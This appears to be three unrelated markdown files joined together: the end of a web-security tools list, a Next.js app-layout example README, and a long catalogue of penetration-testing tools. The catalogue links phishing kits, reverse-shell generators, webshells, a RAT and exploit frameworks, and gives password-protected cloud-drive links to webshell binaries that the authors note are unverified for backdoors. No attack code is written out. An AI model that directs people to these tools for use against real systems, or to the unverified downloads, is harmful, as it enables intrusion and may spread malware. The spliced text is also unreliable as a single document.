- [OWASP ZAP](https://github.com/zaproxy/zaproxy) - World’s most popular free web security tools and is actively maintained by a dedicated international team of volunteers
- [SSTImap](https://github.com/vladko312/SSTImap) - SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.
-
### Uncategorized
- [JSONBee](https://github.com/zigoo0/JSONBee) - A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites.
- [CyberChef](https://github.com/gchq/CyberChef) - The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
- []() -
- [bountyplz](https://github.com/fransr/bountyplz) - Automated security reporting from markdown templates (HackerOne and Bugcrowd are currently the platforms supported)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) - A list of useful payloads and bypass for Web Application Security and Pentest/CTF
- [bounty-targets-data](https://github.com/arkadiyt/bounty-targets-data) - This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for reports
- [android-security-awesome](https://github.com/ashishb/android-security-awesome) - A collection of android security related resources
- [awesome-mobile-security](https://github.com/vaib25vicky/awesome-mobile-security) - An effort to build a single place for all useful android and iOS security related stuff.
- [awesome-vulnerable-apps](https://github.com/vavkamil/awesome-vulnerable-apps) - Awesome Vulnerable Applications
- [XFFenum](https://github.com/vavkamil/XFFenum) - X-Forwarded-For [403 forbidden] enumeration
- [httpx](https://github.com/projectdiscovery/httpx) - httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
- [csprecon](https://github.com/edoardottt/csprecon) - Discover new target domains using Content Security Policy
---
## Contribute
Contributions welcome! Read the [contribution guidelines](contributing.md) first.
---
## License
[![CC0](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](https://creativecommons.org/publicdomain/zero/1.0)
To the extent possible under law, vavkamil has waived all copyright and
related or neighboring rights to this work.
|
# With `App` layout example
## How to use
### Using `create-next-app`
Execute [`create-next-app`](https://github.com/zeit/next.js/tree/canary/packages/create-next-app) with [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) or [npx](https://github.com/zkat/npx#readme) to bootstrap the example:
```bash
npx create-next-app --example with-app-layout with-app-layout-app
# or
yarn create next-app --example with-app-layout with-app-layout-app
```
### Download manually
Download the example:
```bash
curl https://codeload.github.com/zeit/next.js/tar.gz/canary | tar -xz --strip=2 next.js-canary/examples/with-app-layout
cd with-app-layout
```
Install it and run:
```bash
npm install
npm run dev
# or
yarn
yarn dev
```
Deploy it to the cloud with [now](https://zeit.co/now) ([download](https://zeit.co/download))
```bash
now
```
## The idea behind the example
Shows how to use \_app.js to implement a global layout for all pages.
|
# Pentest Tools
![](logo.png)
The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ
## TODO
* [x] Directory
* [ ] Browser bookmarks
* [ ] Tools Usage
* [x] Virtual machine - [Windows11 Penetration Suite Toolkit](https://github.com/arch3rPro/Pentest-Windows)
## List
* [Information Gathering](#information-gathering)
* [Vulnerability Analysis](#vulnerability-analysis)
* [Web Applications](#web-applications)
* [Database Assessment](#database-assessment)
* [Password Attacks](#password-attacks)
* [Wireless Attacks](#Wireless-Attacks)
* [Reverse Engineering](#Reverse-Engineering)
* [Exploitation Tools](#exploitation-tools)
* [Sniffing & Spoofing](#Sniffing-&-Spoofing)
* [Maintaining Access](#maintaining-access)
* [Golang Sec Tools](#Golang-Sec-Tools)
* [Reporting Tools](#reporting-tools)
* [Social Engineering](#Social-Engineering)
* [Code Audit](#code-audit)
* [Port Forwarding & Proxies](#port-forwarding--proxies)
* [DevSecOps](#DevSecOps)
* [RootKit](#RootKit)
* [Pentesting Distribution](#Pentesting-Distribution)
* [Cyber Range](#Cyber-Range)
### Information Gathering
#### Domain Name
* [whois](https://docs.microsoft.com/en-us/sysinternals/downloads/whois) - Windows Whois performs the registration record for the domain name or IP address that you specify. ![](svg/Windows.svg)
* [DNSrecon-gui](https://github.com/micro-joan/DNSrecon-gui) - DNSrecon tool with GUI for Kali Linux
* [Dnsx](https://github.com/projectdiscovery/dnsx) - dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS queries of your choice with a list of user-supplied resolvers.
#### Subdomain
* [subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) - A fast sub domain brute tool for pentesters ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [ksubdomain](https://github.com/boy-hack/ksubdomain) - Subdomain enumeration tool, asynchronous dns packets, use pcap to scan 1600,000 subdomains in 1 second ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Sublist3r](https://github.com/aboul3la/Sublist3r) - Fast subdomains enumeration tool for penetration testers ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [OneForAll](https://github.com/shmilylty/OneForAll) - 👊 OneForAll is a powerful subdomain integration tool ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [LayerDomainFinder](https://github.com/euphrat1ca/LayerDomainFinder) - a subdomains enumeration tool by Layer ![](svg/Windows.svg)
* [ct](https://github.com/knownsec/ct) - Collect information tools about the target domain.
* [Subfinder](https://github.com/projectdiscovery/subfinder) - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
* [Probable_subdomains](https://github.com/zzzteph/probable_subdomains) - Subdomains analysis and generation tool. Reveal the hidden!
* [domains](https://weakpass.com/generate/domains) - Generate subdomains and wordlists Online.
#### Google Hacking
* [GHDB](https://www.exploit-db.com/google-hacking-database/) - Google Hack Database ![](svg/chrome.svg)
* [SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/) - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project ![](svg/Windows.svg)
* [Katana](https://github.com/adnane-X-tebbaa/Katana) - A Python Tool For google Hacking ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [GooFuzz](https://github.com/m3n0sd0n4ld/GooFuzz) - GooFuzz is a tool to perform fuzzing with an OSINT approach, managing to enumerate directories, files, subdomains or parameters without leaving evidence on the target's server and by means of advanced Google searches (Google Dorking). ![](svg/linux.svg)![](svg/mac.svg)
* [Pagodo](https://github.com/opsdisk/pagodo) - pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching . ![](svg/linux.svg)![](svg/mac.svg)
* [Google-Dorks](https://github.com/Proviesec/google-dorks) - Useful Google Dorks for WebSecurity and Bug Bounty
#### Github
* [GitHacker](https://github.com/WangYihang/GitHacker) - 🕷️ A Git source leak exploit tool that restores the entire Git repository, including data from stash, for white-box auditing and analysis of developers' mind. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [GitGraber](https://github.com/hisxo/gitGraber) - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [GitGot](https://github.com/BishopFox/GitGot) Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
* [GitDump](https://github.com/Ebryx/GitDump) - A pentesting tool that dumps the source code from .git even when the directory traversal is disabled
#### SVN
* [svnExploit](https://github.com/admintony/svnExploit) - Support for SVN source code disclosure of full version and Dump it. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [SvnHack](https://github.com/callmefeifei/SvnHack) - SvnHack is a SVN folder disclosure exploit. :lock:
#### Port Scan
* [Nmap | Zenmap](https://nmap.org/) - Free and open source utility for network discovery and security auditing
* [Masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously
* [Ports](https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md) - Common service ports and exploitations
* [Goby](https://gobies.org/) - Attack surface mapping
* [Gobyu-POC](https://github.com/20142995/Goby) - The POC of Goby .
* [Goscan](https://github.com/marco-lancini/goscan) - Interactive Network Scanner
* [NimScan](https://github.com/elddy/NimScan) - 🚀 Fast Port Scanner 🚀
* [RustScan](https://github.com/RustScan/RustScan) - 🤖 The Modern Port Scanner 🤖
* [TXPortMap](https://github.com/4dogs-cn/TXPortMap) - Port Scanner & Banner Identify From TianXiang
* [Scaninfo](https://github.com/redtoolskobe/scaninfo) - fast scan for redtools
* [SX](https://github.com/v-byte-cpu/sx) - 🖖 Fast, modern, easy-to-use network scanner ![](svg/linux.svg)
* [Yujianportscan](https://github.com/foryujian/yujianportscan) A Fast Port Scanner GUI Tools Build by VB.NET + IOCP
* [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with a focus on reliability and simplicity.
#### OSINT
* [theHarvester](https://github.com/laramies/theHarvester)- E-mails, subdomains and names Harvester - OSINT
* [SpiderFoot](https://github.com/smicallef/spiderfoot) - SpiderFoot automates OSINT for threat intelligence and mapping your attack surface.
* [Recon-ng](https://github.com/lanmaster53/recon-ng) - Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources. ![](svg/linux.svg)
* [FOCA](https://github.com/ElevenPaths/FOCA) - Tool to find metadata and hidden information in the documents.
* [Amass](https://github.com/OWASP/Amass) - In-depth Attack Surface Mapping and Asset Discovery
* [Censys-subdomain-finder](https://github.com/christophetd/censys-subdomain-finder) - Perform subdomain enumeration using the certificate transparency logs from Censys.
* [EmailHarvester](https://github.com/maldevel/EmailHarvester) - Email addresses harvester
* [Finalrecon](https://github.com/thewhiteh4t/FinalRecon) - The Last Web Recon Tool You'll Need.
* [LittleBrother](https://github.com/lulz3xploit/LittleBrother) - Information gathering (OSINT) on a person (EU)
* [Octosuite](https://github.com/rly0nheart/octosuite) - Advanced Github OSINT Framework
* [Kunyu](https://github.com/knownsec/Kunyu) - Kunyu, more efficient corporate asset collection
* [Glass](https://github.com/s7ckTeam/Glass) - OSINT Framework with Fofa/ZoomEye/Shodan/360 API
* [BBOT](https://github.com/blacklanternsecurity/bbot) - OSINT automation for hackers.
* [octosuite](https://github.com/bellingcat/octosuite) - Advanced Github OSINT Framework
* [GHunt](https://github.com/mxrch/GHunt) - 🕵️♂️ Offensive Google framework.
### Phishing
* [gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit
* [AdvPhishing](https://github.com/Ignitetch/AdvPhishing) - This is Advance Phishing Tool ! OTP PHISHING
* [SocialFish](https://github.com/UndeadSec/SocialFish) - Educational Phishing Tool & Information Collector
* [Zphisher](https://github.com/htr-tech/zphisher) - An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
* [Nexphisher](https://github.com/htr-tech/nexphisher) - Advanced Phishing tool for Linux & Termux
### Vulnerability Analysis
#### Fuzzing
* [httpX](https://github.com/projectdiscovery/httpx) -httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library.
#### Vulnerability Scanner
* [Struts-Scan](https://github.com/Lucifer1993/struts-scan) - Struts2 vulnerability detection and utilization tools
* [Nikto](https://github.com/sullo/nikto) - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items
* [W3af](https://github.com/andresriancho/w3af/) - Web application attack and audit framework, the open source web vulnerability scanner
* [Openvas](http://www.openvas.org/) - The world's most advanced Open Source vulnerability scanner and manager
* [Openvas Docker](https://github.com/mikesplain/openvas-docker)
* [Archery](https://github.com/archerysec/archerysec) - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities
* [Taipan](https://github.com/enkomio/Taipan) - Web application vulnerability scanner
* [Arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework
* [Nuclei](https://github.com/projectdiscovery/nuclei) - Fast and customizable vulnerability scanner based on simple YAML based DSL.
* [Xray](https://github.com/chaitin/xray) - A passive-vulnerability-scanner Tool. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Super-Xray](https://github.com/4ra1n/super-xray) - Web Vulnerability Scanner XRAY GUI Starter ![](svg/Windows.svg)
* [SiteScan](https://github.com/kracer127/SiteScan) - AllinOne Website Information Gathering Tools for pentest.
* [Banli](https://github.com/Goqi/Banli) - High-risk asset identification and high-risk vulnerability scanner. ![](svg/Windows.svg)
* [vscan](https://github.com/veo/vscan) - Open Source Vulnerability Scanner. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Wapiti](https://github.com/wapiti-scanner/wapiti) - Web vulnerability scanner written in Python3.
* [Scaninfo](https://github.com/redtoolskobe/scaninfo) - fast scan for redtools
* [osv-scanner](https://github.com/google/osv-scanner) - Vulnerability scanner written in Go which uses the data provided by https://osv.dev
* [Afrog](https://github.com/zan8in/afrog) - A Vulnerability Scanning Tools For Penetration Testing
### Web Applications
#### CMS & Framwork Identification
* [AngelSword](https://github.com/Lucifer1993/AngelSword) - CMS vulnerability detection framework :lock:
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Next generation web scanner ![](svg/linux.svg)
* [Wappalyzer](https://github.com/AliasIO/Wappalyzer) - Cross-platform utility that uncovers the technologies used on websites ![](svg/chrome.svg)
* [Whatruns](https://www.whatruns.com/) - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome)![](svg/chrome.svg)
* [WhatCMS](https://github.com/HA71/WhatCMS) - CMS Detection and Exploit Kit based on Whatcms.org API
* [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs
* [EHole](https://github.com/EdgeSecurityTeam/EHole) - CMS Detection for RedTeam ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [ObserverWard](https://github.com/0x727/ObserverWard) - Cross platform community web fingerprint identification tool
* [FingerprintHub](https://github.com/0x727/FingerprintHub) - The Database of ObserverWard
> Online Tools
* [Yunsee](http://www.yunsee.cn/) - Online website for to find the CMS footprint ![](svg/chrome.svg)
* [Bugscaner](http://whatweb.bugscaner.com/look/) - A simple online fingerprint identification system that supports hundreds of cms source code recognition ![](svg/chrome.svg)
* [WhatCMS online](https://whatcms.org/) - CMS Detection and Exploit Kit website Whatcms.org ![](svg/chrome.svg)
* [TideFinger](http://finger.tidesec.com/) - Fingerprinter Tool from TideSec Team :lock: ![](svg/chrome.svg)
* [360finger-p](https://fp.shuziguanxing.com/) - Fingerprinter Tool from 360 Team ![](svg/chrome.svg)
#### Web Applications Proxies
* [Burpsuite](https://portswigger.net/) - Burpsuite is a graphical tool for testing Web application security ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [ZAP](https://github.com/zaproxy/zaproxy) One of the world’s most popular free security tools ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Broxy](https://github.com/rhaidiz/broxy) - An HTTP/HTTPS intercept proxy written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Hetty](https://github.com/dstotijn/hetty) - An HTTP toolkit for security research. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Proxify](https://github.com/projectdiscovery/proxify) - Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.
#### web browser extension
* [Hack-Tools](https://github.com/LasCC/Hack-Tools) - The all-in-one Red Team extension for Web Pentester 🛠
#### Web Crawlers & Directory Brute Force
* [Dirbrute](https://github.com/Xyntax/DirBrute) - Multi-thread WEB directory blasting tool (with dics inside) :lock:
* [Dirb](https://dirb.sourceforge.net/) - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Dirbuster](https://sourceforge.net/projects/dirbuster/) - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [Gobuster](https://github.com/OJ/gobuster) Directory/File, DNS and VHost busting tool written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg)
* [WebPathBrute](https://github.com/7kbstorm/7kbscan-WebPathBrute) - Web path Bruter. ![](svg/Windows.svg)
* [wfuzz](https://github.com/xmendez/wfuzz) - Web application fuzzer ![](svg/Windows.svg)![](svg/linux.svg)
* [Dirmap](https://github.com/H4ckForJob/dirmap) - An advanced web directory & file scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian.
* [YJdirscan](https://github.com/foryujian/yjdirscan) - Yujian dirscan Gui Pro
#### Docker Scanners
* [Fuxi-Scanner](https://github.com/jeffzh3ng/Fuxi-Scanner) - open source network security vulnerability scanner, it comes with multiple functions. ![](svg/Docker.svg)
* [Xunfeng](https://github.com/ysrc/xunfeng) - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets. ![](svg/Docker.svg)
* [WebMap](https://github.com/SabyasachiRana/WebMap) - Nmap Web Dashboard and Reporting. ![](svg/Docker.svg)
* [Pentest-Collaboration-Framework](https://gitlab.com/invuls/pentest-projects/pcf) - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing!
### Database Assessment
* [Enumdb](https://github.com/m8sec/enumdb) - Relational database brute force and post exploitation tool for MySQL and MSSQL
* [MDUT](https://github.com/SafeGroceryStore/MDUT) - Multiple Database Utilization Tools
* [Sylas](https://github.com/Ryze-T/Sylas) - Multiple Database Exploitation Tools
* [ODAT](https://github.com/quentinhardy/odat) - Oracle Database Attacking Tool
* [MSDAT](https://github.com/quentinhardy/msdat) - Microsoft SQL Database Attacking Tool
### Password Attacks
* [Hydra](https://github.com/vanhauser-thc/thc-hydra) - Hydra is a parallelized login cracker which supports numerous protocols to attack
* [Medusa](http://foofus.net/goons/jmk/medusa/medusa.html) - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer
* [Sparta](https://github.com/SECFORCE/sparta) - Network Infrastructure Penetration Testing Tool. ![](svg/linux.svg)
* [Hashcat](https://github.com/hashcat/hashcat) - World's fastest and most advanced password recovery utility
* [Patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
* [HackBrowserDat](https://github.com/moonD4rk/HackBrowserData) - Decrypt passwords/cookies/history/bookmarks from the browser
* [John](https://github.com/openwall/john) - John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.
#### Wordlists
* [wordlists](https://github.com/trickest/wordlists/) - Real-world infosec wordlists, updated regularly
* [psudohash](https://github.com/t3l3machus/psudohash) - Password list generator that focuses on keywords mutated by commonly used password creation patterns
* [wister](https://github.com/cycurity/wister) - A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.
* [Rockyou](https://gitlab.com/kalilinux/packages/wordlists) - wordlists packaging for Kali Linux.
* [Weakpass](https://weakpass.com/) - For any kind of bruteforce find wordlists.
### Wireless Attacks
#### Wireless Tools
* [Fern Wifi cracker](https://github.com/savio-code/fern-wifi-cracker) - Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in ones own network with the aim of fixing the flaws detected
### Reverse Engineering
* [Ollydbg](http://www.ollydbg.de/) - OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows
### Exploitation Tools
#### Vulnerability Search
* [SPLOITUS](https://sploitus.com) - Sploitus is а convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities
* [SearchSploit](https://github.com/offensive-security/exploitdb) - The official Exploit Database repository
* [Getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits
* [Houndsploit](https://github.com/nicolas-carolo/houndsploit) - An advanced graphical search engine for Exploit-DB
* [OSV](https://osv.dev/) - Open source vulnerability DB and triage service.
#### Cross-site Scripting(XSS)
* [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project
* [BlueLotus_XSSReceiver](https://github.com/firesunCN/BlueLotus_XSSReceiver) - XSS Receiver platform without SQL
* [XSStrike](https://github.com/s0md3v/XSStrike) - Most advanced XSS scanner.
* [xssor2](https://github.com/evilcos/xssor2) - XSS'OR - Hack with JavaScript.
* [Xsser-Varbaek](https://github.com/Varbaek/xsser) - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras
* [Xsser-Epsylon](https://github.com/epsylon/xsser) - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
* [Xenotix](https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework) - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework
* [PwnXSS](https://github.com/pwn0sec/PwnXSS) - PwnXSS: Vulnerability (XSS) scanner exploit
* [dalfox](https://github.com/hahwul/dalfox) - 🌙🦊 DalFox is an powerful open source XSS scanning tool and parameter analyzer, utility
* [ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
#### Sql Injection
* [Sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [SSQLInjection](https://github.com/shack2/SuperSQLInjectionV1) - SSQLInjection is a SQL injection tool , support Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix Database.
* [Jsql-injection](https://github.com/ron190/jsql-injection) jSQL Injection is a Java application for automatic SQL database injection.
* [NoSQLMap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool.
* [Sqlmate](https://github.com/s0md3v/sqlmate) - A friend of SQLmap which will do what you always expected from SQLmap
* [SQLiScanner](https://github.com/0xbug/SQLiScanner) - Automatic SQL injection with Charles and sqlmap api
* [sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list) - 🎯 SQL Injection Payload List
* [Advanced-SQL-Injection-Cheatsheet](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet) - A cheat sheet that contains advanced queries for SQL Injection of all types.
#### Command Injection
* [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool
#### File Include
* [LFIsuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
* [Lfi-Space](https://github.com/capture0x/Lfi-Space) - Lfi Scan Tool
* [Kadimus](https://github.com/P0cL4bs/Kadimus) - Kadimus is a tool to check sites to lfi vulnerability , and also exploit it
* [Shellfire](https://github.com/unix-ninja/shellfire) - Exploitation shell for exploiting LFI, RFI, and command injection vulnerabilities
* [LFIter2](https://github.com/3mrgnc3/LFIter2) - LFIter2 Local File Include (LFI) Tool - Auto File Extractor & Username Bruteforcer
* [FDsploit](https://github.com/chrispetrou/FDsploit) - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
#### File Upload vulnerability
* [Fuxploider](https://github.com/almandin/fuxploider) - File upload vulnerability scanner and exploitation tool
#### XML External Entity Attack(XXE)
* [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
* [Oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes
#### Cross-site request forgery (CSRF)
* [Deemon](https://github.com/tgianko/deemon/) - Deemon is a tool to detect CSRF in web application
#### Deserialization exploit framework
* [Ysomap](https://github.com/wh1t3p1g/ysomap) - A helpful Java Deserialization exploit framework.
#### Exploit Framework
* [POC-T](https://github.com/Xyntax/POC-T) - Pentest Over Concurrent Toolkit
* [Pocsuite3](https://github.com/knownsec/pocsuite3) - pocsuite3 is an open-sourced remote vulnerability testing framework developed by the Knownsec 404 Team.
* [Metasploit](https://github.com/rapid7/metasploit-framework) - The world’s most used penetration testing framework
* [Venom](https://github.com/r00t-3xp10it/venom) - Shellcode generator/compiler/handler (metasploit)
* [Empire](https://github.com/BC-SECURITY/Empire) - Empire is a PowerShell and Python post-exploitation agent
* [Starkiller](https://github.com/BC-SECURITY/Starkiller) - Starkiller is a Frontend for PowerShell Empire.
* [Koadic](https://github.com/zerosum0x0/koadic) - Koadic C3 COM Command & Control - JScript RAT
* [Viper](https://github.com/FunnyWolf/Viper) - metasploit-framework UI manager Tools
* [MSFvenom-gui](https://github.com/ssooking/msfvenom-gui) - gui tool to create normal payload by msfvenom
* [MYExploit](https://github.com/achuna33/MYExploit) - A GUI Tools for Scanning OA vulnerabilities
#### Machine Learning
* [DeepExploit](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit) - Fully automatic penetration test tool using Machine Learning
* [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is a growing penetration test tool using Machine Learning
* [Generator](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator) - Fully automatically generate numerous injection codes for web application assessment
#### Automate
* [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated Mass Exploiter
* [WinPwn](https://github.com/SecureThisShit/WinPwn) - Automation for internal Windows Penetrationtest / AD-Security
### Sniffing & Spoofing
* [WireShark](https://github.com/wireshark/wireshark) - Wireshark is a network traffic analyzer, or "sniffer", for Unix and Unix-like operating systems.
* [Cain & able](http://www.oxid.it/cain.html) - Cain & Abel is a password recovery tool for Microsoft Operating Systems.
### Maintaining Access
#### Shell
* [Goshell](https://github.com/eze-kiel/goshell) - Generate reverse shells in command line with Go !
* [Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell) - Python script wrote to automate the process of generating various reverse shells.
* [Reverse-shell-generator](https://github.com/0dayCTF/reverse-shell-generator) - Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)
* [Girsh](https://github.com/nodauf/Girsh) - Automatically spawn a reverse shell fully interactive for Linux or Windows victim
* [Blueshell](https://github.com/whitehatnote/BlueShell) - Generate a reverse shells for RedTeam
* [Clink](http://mridgers.github.io/clink/) - Powerful Bash-style command line editing for cmd.exe
* [Natpass](https://github.com/jkstack/natpass) - A new RAT Tools, Support Web VNC and Webshell
* [Platypus](https://github.com/WangYihang/Platypus) 🔨 A modern multiple reverse shell sessions manager written in go
* [shells](https://github.com/4ndr34z/shells/) - Script for generating revshells
* [Reverse_ssh](https://github.com/NHAS/reverse_ssh) - SSH based reverse shell
* [Hoaxshell](https://github.com/t3l3machus/hoaxshell) - A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.
#### Listener
* [Netcat](https://netcat.sourceforge.net/) - Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
* [Rustcat](https://github.com/robiot/rustcat) - Rustcat(rcat) - The modern Port listener and Reverse shell.
* [Rlwrap](https://github.com/hanslub42/rlwrap) - A readline wrapper.
* [Pwncat](https://github.com/calebstewart/pwncat) - Fancy reverse and bind shell handler.
* [Powercat](https://github.com/besimorhino/powercat) - netshell features all in version 2 powershell.
* [Socat](https://repo.or.cz/socat.git) - Socat is a flexible, multi-purpose relay tool.
#### Web Shell
* Chopper
> Tips: The tool comes from the network, no backdoor verification, please choose it on yourself......
> Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d
* [AntSword](https://github.com/AntSwordProject/antSword) : [Document](https://doc.u0u.us/zh-hans/index.html) - AntSword is a cross-platform website management toolkit
* [CKnife](https://github.com/Chora10/Cknife) - The cross platform webshell tool in java
> Tips: The tool comes from the network, no backdoor verification, please choose it on yourself......
> Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh
* [Behinder](https://github.com/rebeyond/Behinder) - dynamic binary encryption webshell management client
* [Godzilla](https://github.com/BeichenDream/Godzilla) - a Java tool to encrypt network traffic
* [Skyscorpion](https://github.com/shack2/skyscorpion) - Modified version of Behinder.
* [PyShell](https://github.com/JoelGMSec/PyShell) - Multiplatform Python WebShell.
* [Weevely3](https://github.com/epinna/weevely3) - Weaponized web shell.
* [Bantam](https://github.com/gellin/bantam) - A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems.
* [Awsome-Webshells](https://github.com/abhinavprasad47/Awsome-Webshells) - Collection of reverse shells.
* [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) - Simple php reverse shell implemented using binary.
* [Webshell_Generate](https://github.com/cseroad/Webshell_Generate) - Generate kind of Webshells bypass AV
#### Privilege Escalation Auxiliary
* [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target
* [Windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) - windows-kernel-exploits
* [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2) - Next-Generation Linux Kernel Exploit Suggester
* [Linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits) - linux-kernel-exploits Linux
* [BeRoot](https://github.com/AlessandroZ/BeRoot) - Privilege Escalation Project - Windows / Linux / Mac
